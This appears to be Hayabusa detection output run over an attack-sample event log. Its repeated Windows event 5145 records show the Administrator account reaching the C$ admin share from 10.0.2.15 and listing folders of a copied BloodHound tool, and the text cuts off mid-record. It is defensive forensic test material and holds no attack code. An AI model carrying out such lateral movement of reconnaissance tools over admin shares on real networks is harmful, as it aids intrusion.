0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 